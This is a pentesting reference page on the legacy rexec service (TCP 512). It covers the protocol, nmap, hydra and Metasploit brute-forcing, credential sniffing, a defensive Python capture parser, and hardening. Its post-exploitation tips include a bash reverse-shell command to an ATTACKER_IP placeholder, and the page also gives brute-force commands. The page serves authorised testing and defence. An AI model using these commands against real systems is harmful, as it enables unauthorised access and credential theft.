512 - Pentesting Rexec


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Rexec (remote exec) is one of the original Berkeley r-services (together with rlogin, rsh, …). It provides remote command execution authenticated only by a clear-text username and password. The protocol dates from the early 1980s (see RFC 1060) and is nowadays considered insecure by design. Nevertheless it is still enabled by default on some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.

Default Port: TCP 512 (exec)

```
PORT    STATE SERVICE
512/tcp open  exec
```

🔥 All traffic, including credentials, is transmitted unencrypted. Anyone able to sniff the network can recover the username, password and command.

Protocol quick-look

  1. Client connects to TCP 512.
  2. Client sends three NUL-terminated strings:
    • the port number (as ASCII) where it wishes to receive stdout/stderr (often 0),
    • the username,
    • the password.
  3. A final NUL-terminated string with the command to execute is sent.
  4. The server replies with a single 8-bit status byte (0 = success, 1 = failure) followed by the command output.

That means you can reproduce the exchange with nothing more than echo -ne and nc:

```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```

If the credentials are valid you will receive the output of id straight back on the same connection.

Manual usage with the client

Many Linux distributions still ship the legacy client inside the inetutils-rexec / rsh-client package:

```bash
rexec -l user -p password <target> "uname -a"
```

If -p is omitted the client prompts interactively for the password (which still travels over the wire in clear-text).


Enumeration & Brute-forcing

Brute-force

Nmap

```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```

The rexec-brute NSE script uses the protocol described above to try credentials very quickly.

Hydra / Medusa / Ncrack

```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```

hydra has a dedicated rexec module and remains the fastest offline brute-forcer. medusa (-M REXEC) and ncrack (rexec module) can be used in the same way.

Metasploit

```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```

The module spawns a shell on success and stores the credentials in the database.


Sniffing credentials

Because everything is clear-text, network captures are priceless. With a copy of the traffic you can extract credentials without touching the target:

```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
  awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command
```

(In Wireshark enable Decode As… TCP 512 → REXEC to view nicely-parsed fields.)
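The same extraction can be done offline and deterministically once the TCP payloads have been reassembled. The following Python is an added example for this page, not HackTricks or inetutils code: it implements the wire format from "Protocol quick-look" (four NUL-terminated client fields, then a one-byte status from the server) and turns a parsed request into a detection log line that records the authentication without writing the clear-text password to the log. The sample bytes, hostnames and the constants CLIENT_OK / SERVER_OK / SERVER_FAIL are constructed for the example, not taken from a real capture.

```python
"""Parse a captured rexec (TCP/512) exchange into its protocol fields.

Added example for this page (not HackTricks or inetutils code). The wire
format is the one described in "Protocol quick-look": the client sends
<port>\0<user>\0<password>\0<command>\0 and the server answers with one
status byte (0 = success, 1 = failure) followed by the command output.
All sample bytes below are constructed, not taken from a real capture.
"""
from dataclasses import dataclass
from typing import Tuple


@dataclass
class RexecRequest:
    port: int          # client port for the separate output channel, 0 = none
    username: str
    password: str
    command: str


@dataclass
class RexecResponse:
    status: int        # 0 = success, 1 = failure (e.g. bad credentials)
    output: bytes      # everything the server sent after the status byte


def parse_request(payload: bytes) -> Tuple[RexecRequest, bytes]:
    """Split a client->server TCP payload into the four rexec fields.

    Returns the parsed request plus any bytes that followed the command's
    terminating NUL (those are stdin for the remote command, e.g. what `cat`
    pipes in the echo/nc one-liner). Raises ValueError when fewer than four
    NUL-terminated fields are present, i.e. the request is truncated or the
    stream was reassembled incompletely.
    """
    parts = payload.split(b"\x00", 4)
    if len(parts) < 5:
        raise ValueError("truncated rexec request: need 4 NUL-terminated fields")
    port_raw, user, password, command, rest = parts
    if not port_raw.isdigit() or not 0 <= int(port_raw) <= 65535:
        raise ValueError(f"invalid port field {port_raw!r}")
    req = RexecRequest(
        port=int(port_raw),
        username=user.decode("utf-8", "replace"),
        password=password.decode("utf-8", "replace"),
        command=command.decode("utf-8", "replace"),
    )
    return req, rest


def parse_response(payload: bytes) -> RexecResponse:
    """Split a server->client payload into the status byte and the output."""
    if not payload:
        raise ValueError("empty rexec response")
    return RexecResponse(status=payload[0], output=payload[1:])


def format_alert(req: RexecRequest, src: str, dst: str) -> str:
    """Render a detection log line for a clear-text rexec authentication.

    The password itself is deliberately left out of the log: its presence
    and length are enough for triage, and the capture already holds it.
    """
    return (
        f"rexec clear-text auth {src} -> {dst}:512 "
        f"user={req.username!r} cmd={req.command!r} "
        f"pw_len={len(req.password)} reply_port={req.port}"
    )


# Constructed sample exchange (hypothetical hosts and credentials): a
# successful `id` and, on a second connection, a rejected login.
CLIENT_OK = b"0\x00user\x00s3cret!\x00id\x00"
SERVER_OK = b"\x00uid=1000(user) gid=1000(user) groups=1000(user)\n"
SERVER_FAIL = b"\x01Login incorrect.\n"

if __name__ == "__main__":
    req, stdin_rest = parse_request(CLIENT_OK)
    print(format_alert(req, "10.0.0.5", "10.0.0.9"))
    print("status:", parse_response(SERVER_OK).status)
    print("status:", parse_response(SERVER_FAIL).status)
```

Feed `parse_request` the client-to-server direction of a TCP/512 stream (for example the output of a follow-stream export) and `parse_response` the server-to-client direction; a status byte of 0 on a session whose request carried a real account name is the strongest single indicator that credentials have been exposed.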


Post-Exploitation tips

  • Commands run with the privileges of the supplied user. If /etc/pam.d/rexec is mis-configured (e.g. pam_rootok), root shells are sometimes possible.
  • Rexec ignores the user's shell and executes the command via /bin/sh -c <cmd>. You can therefore use typical shell-escape tricks (;, $( ), backticks) to chain multiple commands or spawn reverse shells:
    rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
  • Passwords are often stored in ~/.netrc on other systems; if you compromise one host you may reuse them for lateral movement.

Hardening / Detection

  • Do not expose rexec; replace it with SSH. Virtually all modern inetd superservers comment the service out by default.
  • If you must keep it, restrict access with TCP wrappers (/etc/hosts.allow) or firewall rules and enforce strong per-account passwords.
  • Monitor for traffic to :512 and for rexecd process launches. Because credentials travel in clear-text, a single packet capture of a session is enough to confirm a compromise.
  • Disable rexec, rlogin and rsh together: they share most of the same codebase and weaknesses.
